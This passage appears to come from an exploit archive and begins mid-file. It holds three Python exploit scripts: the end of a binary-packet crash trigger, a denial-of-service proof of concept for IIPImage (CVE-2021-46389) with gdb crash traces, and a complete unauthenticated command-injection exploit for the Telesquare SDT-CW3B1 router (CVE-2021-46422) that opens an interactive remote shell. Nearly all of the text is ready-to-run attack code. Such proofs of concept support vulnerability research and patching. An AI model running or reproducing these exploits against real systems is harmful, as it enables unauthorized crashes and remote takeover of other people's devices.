TRIGGER_ONE_PKT_1 TRIGGER_TWO_PKT_2 = TRIGGER_ONE_PKT_2 TRIGGER_TWO_PKT_3 = PKT_START + \ b'\x03\x00\x00\x00\x3a\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\xb7\x06\x08\x38\x10\x03\x18\x00\x28\x00\x42\xac\x06\xaa\x01\xa8\x06\x28\x03\x00\x01' + \ b'\x00' * 12 + \ b'\x01\x00\x00\x00\x01' + \ b'\x00' * 523 + \ b'\x19\x00\x00\x00\x9e\x00\x9f\x00\xa4\x00\xa0\x00\xa3\x00\xa2\x00\xa1\x00\x82\x00\x36\x00\x55\x00\x52\x00\x33\x00\x32\x00\x35\x00\x39\x00\x3a\x00\x3b\x00\x5a\x00\xfa\x00\xfc\x00\xfb\x00\x01\x00\xf4\x01\x42\x00\x43' + \ b'\x00' * 207 + \ b'\x01\x00\x00\x00' # 0x79 triggers crash TRIGGER_TWO_PKT_4 = PKT_START + \ b'\x04\x00\x00\x00\x1c\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x0a\x1a\x08\x04\x10\x03\x18' + \ b'\xff' * 9 + \ b'\x01' + \ b'\x79' + \ b'\x00\x42\x07\xd2\x01\x04\x08\x03\x10\x00' class Heart(object): def __init__(self, args): self.host = args.host self.trigger = args.trigger def run(self): if(self.trigger == None): print("error: choose which bug use via --trigger") return -1 sock = self.getSock() if(sock == None): return -1 try: sock.connect((self.host, DEFAULT_PORT)) except Exception as error: print("connect() failed: %s\n" % error) return -1 if(self.trigger == 'pkt3_mem'): if(self.sendPacket(sock, TRIGGER_ONE_PKT_1) < 0): print("failed to send/recv packet 1\n") return -1 if(self.sendPacket(sock, TRIGGER_ONE_PKT_2) < 0): print("failed to send/recv packet 2\n") return -1 if(self.sendPacket(sock, TRIGGER_ONE_PKT_3) < 0): print("failed to send/recv packet 3\n") return -1 if(self.trigger == 'pkt4_null'): if(self.sendPacket(sock, TRIGGER_TWO_PKT_1) < 0): print("failed to send/recv packet 1\n") return -1 if(self.sendPacket(sock, TRIGGER_TWO_PKT_2) < 0): print("failed to send/recv packet 2\n") return -1 if(self.sendPacket(sock, TRIGGER_TWO_PKT_3) < 0): print("failed to send/recv packet 3\n") return -1 if(self.sendPacket(sock, TRIGGER_TWO_PKT_4) < 0): print("failed to send/recv packet 4\n") return -1 print("done\n") return 0 def getSock(self): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(2) except Exception as error: print("socket() failed: %s\n" % error) return None return sock def sendPacket(self, sock, pkt): try: sock.send(pkt) except Exception as error: print("socket send error: %s\n" % error) return -1 try: sock.recv(256) except Exception as error: # print("socket recv error: %s\n" % error) return 0 # expected for pkt3_mem return 0 def signalExit(signum, frame): sys.exit(-1) def arg_parse(): parser = argparse.ArgumentParser() parser.add_argument("host", type=str, help="target host") parser.add_argument("--trigger", "--trigger", type=str, choices=['pkt3_mem', 'pkt4_null'], help="which bug to trigger") args = parser.parse_args() return args def main(): signal.signal(signal.SIGINT, signalExit) args = arg_parse() rh = Heart(args) result = rh.run() if(result > 0): sys.exit(-1) if(__name__ == '__main__'): main() </code></pre>

<pre><code>#!/usr/bin/python3 # -*- coding: UTF-8 -*- # # thiel.py # # IIPImage Multiple Remote Memory Corruption Vulnerabilities # # Jeremy Brown [jbrown3264/gmail] # # IIPImage is distributed with a server that enables advanced, high-performance # image manipulation for web-based streaming and viewing of high resolution images. # The server component called iipsrv.fcgi processes requests from users and passes # them to command handlers. Several crashes including an integer overflow were # discovered by sending malformed requests to the server, allowing remote users # without authentication to perform denial-of-service attacks or potentially # crafted for remote code execution as the server's running user. # # Tested on Ubuntu 20.04 with NGINX fastcgi_pass localhost:9000 configuration # # Demo # # $ ./thiel.py http://10.0.0.201 --trigger iiif # # (gdb) r --bind 0.0.0.0:9000 # 9000 for nginx comms, port 80 externally # ... # # Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault. # __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:319 # (gdb) i r # rax 0x7ffef6d50b68 140733039577960 # rbx 0xffffffff 4294967295 # rcx 0xb3 179 # rdx 0x6 6 # rsi 0x5555556ae20d 93824993649165 # rdi 0x7ffef6d50b68 140733039577960 # rbp 0x7fffffffc690 0x7fffffffc690 # rsp 0x7fffffffc4b8 0x7fffffffc4b8 # r8 0x0 0 # r9 0x0 0 # r10 0x55555564f4e0 93824993260768 # r11 0x7ffef6d50b68 140733039577960 # r12 0xb58 2904 # r13 0x81 129 # r14 0x1e4 484 # r15 0x8 8 # rip 0x7ffff7a53708 0x7ffff7a53708 <__memmove_avx_unaligned_erms+152> # # => 0x7ffff7a53708 <__memmove_avx_unaligned_erms+152>: mov ecx,DWORD PTR [rsi+rdx*1-0x4] # # 0 __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:319 # 1 0x0000555555573b5c in memcpy (__len=6, __src=<optimized out>, __dest=<optimized out>) at /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 # 2 TileManager::getRegion (this=this@entry=0x7fffffffc7d0, res=res@entry=0, seq=0, ang=90, layers=0, x=<optimized out>, y=<optimized out>, width=<optimized out>, height=<optimized out>) at TileManager.cc:470 # 3 0x000055555558c914 in CVT::send (this=this@entry=0x7fffffffd390, session=session@entry=0x7fffffffd8b0) at CVT.cc:222 # 4 0x000055555559a06e in IIIF::run (this=0x5555555e2e20, session=0x7fffffffd8b0, src=...) at IIIF.cc:656 # 5 0x0000555555566cf4 in main (argc=<optimized out>, argv=<optimized out>) at Main.cc:741 # # Fixes # - commits 4ed59265fbbd636dc2fbbf325f8ea37ed300a6d9, 882925b295a80ec992063deffc2a3b0d803c3195 # # CVE-2021-46389 # import os import sys import argparse import signal import requests PATH = '/fcgi-bin/iipsrv.fcgi' # # also there's many params for some functions like fif such as obj, qlt, sds, # cnt, cvt, wid, rgn, etc so the code definitely needs lots of input validation # QUERY_FIF = '?fif=' QUERY_IIIF = '?iiif=' QUERY_SPECTRA = '?spectra=' # # Some bugs require a valid file (eg. tiled TIF) to be present on the server (eg. IIIF big region) # # sample: https://openslide.cs.cmu.edu/download/openslide-testdata/Generic-TIFF/CMU-1.tiff # VALID_FILE = '/var/www/test.tif' ### BUGS ### # # Bug #1: Integer overflow @ TileManager::getRegion() # # Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault. # __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:319 # # REQ = QUERY_IIIF + VALID_FILE + '/full,32883,500,500/256,/0/default.jpg' # image # REQ = QUERY_IIIF + VALID_FILE + '/full,32884,500,500/256,/0/default.jpg' # image error REQ_IIIF = QUERY_IIIF + VALID_FILE + '/full,32912,500,500/256,/0/default.jpg' # SIGSEGV # REQ_FIF_WID = QUERY_FIF + VALID_FILE + '&wid=652455&cvt=jpeg' # SIGSEGV (starts at CVT::run instead of IIIF:run) # # Bug #2: NULL ptr deref @ SPECTRA::run # # Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault. # SPECTRA::run (this=0x5555555e2f70, session=0x7fffffffd8b0, argument=...) at IIPImage.h:335 # 335 unsigned int getTileWidth() { return tile_width; }; # REQ_SPECTRA = QUERY_SPECTRA + 'x' # no valid file necessary # # Bug #3: Another crash @ JTL::run # # Thread 1 "iipsrv.fcgi" received signal SIGSEGV, Segmentation fault. # JTL::send (this=this@entry=0x5555555e3200, session=session@entry=0x7fffffffd8c0, resolution=resolution@entry=129165, tile=tile@entry=1) at IIPImage.h:324 # 324 unsigned int getImageWidth( int n=0 ) { return image_widths[n]; }; # REQ_FIF_JTL = QUERY_FIF + VALID_FILE + '&jtl=129500,1' # try larger value if no crash # ### END BUGS ### class Thiel(object): def __init__(self, args): self.host = args.host self.trigger = args.trigger def run(self): if(self.trigger == None): print("error: choose which bug use via --trigger") return -1 if(self.trigger == 'iiif'): return self.sendRequest(self.host, REQ_IIIF) if(self.trigger == 'spectra'): return self.sendRequest(self.host, REQ_SPECTRA) if(self.trigger == 'fif_jtl'): return self.sendRequest(self.host, REQ_FIF_JTL) return 0 def sendRequest(self, host, req): session = requests.Session() try: resp = session.get(host + PATH + req) except Exception as error: print("Error: %s" % error) return -1 if(b'502 Bad Gateway' in resp.content): print("done\n") return 0 else: print("[-] iipsrv still appears to be up\n") return -1 def signalExit(): sys.exit(-1) def arg_parse(): parser = argparse.ArgumentParser() parser.add_argument("host", type=str, help="target host") parser.add_argument("--trigger", "--trigger", type=str, choices=['iiif', 'spectra', 'fif_jtl'], help="which bug to trigger") args = parser.parse_args() return args def main(): signal.signal(signal.SIGINT, signalExit) args = arg_parse() pt = Thiel(args) result = pt.run() if(result > 0): sys.exit(-1) if(__name__ == '__main__'): main() </code></pre>

<pre><code>#!/usr/bin/python3 # Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection # Date: 24th May 2022 # Exploit Author: Bryan Leong <NobodyAtall> # Vendor Homepage: http://telesquare.co.kr/ # CVE : CVE-2021-46422 # Authentication Required: No import requests import argparse import sys from xml.etree import ElementTree def sysArgument(): ap = argparse.ArgumentParser() ap.add_argument("--host", required=True, help="target hostname/IP") args = vars(ap.parse_args()) return args['host'] def checkHost(host): url = "http://" + host print("[*] Checking host is it alive?") try: rsl = requests.get(url) print("[*] The host is alive.") except requests.exceptions.Timeout as err: raise SystemExit(err) def exploit(host): url = "http://" + host + "/cgi-bin/admin.cgi?Command=sysCommand&Cmd=" #checking does the CGI exists? rsl = requests.get(url) if(rsl.status_code == 200): print("[*] CGI script exist!") print("[*] Injecting some shell command.") #1st test injecting id command cmd = "id" try: rsl = requests.get(url + cmd, stream=True) xmlparser = ElementTree.iterparse(rsl.raw) cmdRet = [] for event, elem in xmlparser: if(elem.tag == 'CmdResult'): cmdRet.append(elem.text) except: print("[!] No XML returned from CGI script. Possible not vulnerable to the exploit") sys.exit(0) if(len(cmdRet) != 0): print("[*] There's response from the CGI script!") print('[*] System ID: ' + cmdRet[0].strip()) print("[*] Spawning shell. type .exit to exit the shell", end="\n\n") #start shell iteration while(True): cmdInput = input("[SDT-CW3B1 Shell]# ") if(cmdInput == ".exit"): print("[*] Exiting shell.") sys.exit(0) rsl = requests.get(url + cmdInput, stream=True) xmlparser = ElementTree.iterparse(rsl.raw) for event, elem in xmlparser: if(elem.tag == 'CmdResult'): print(elem.text.strip()) print('\n') else: print("[!] Something doesn't looks right. Please check the request packet using burpsuite/wireshark/etc.") sys.exit(0) else: print("[!] CGI script not found.") print(rsl.status_code) sys.exit(0) def main(): host = sysArgument() checkHost(host) exploit(host) if __name__ == "__main__": main() </code></pre>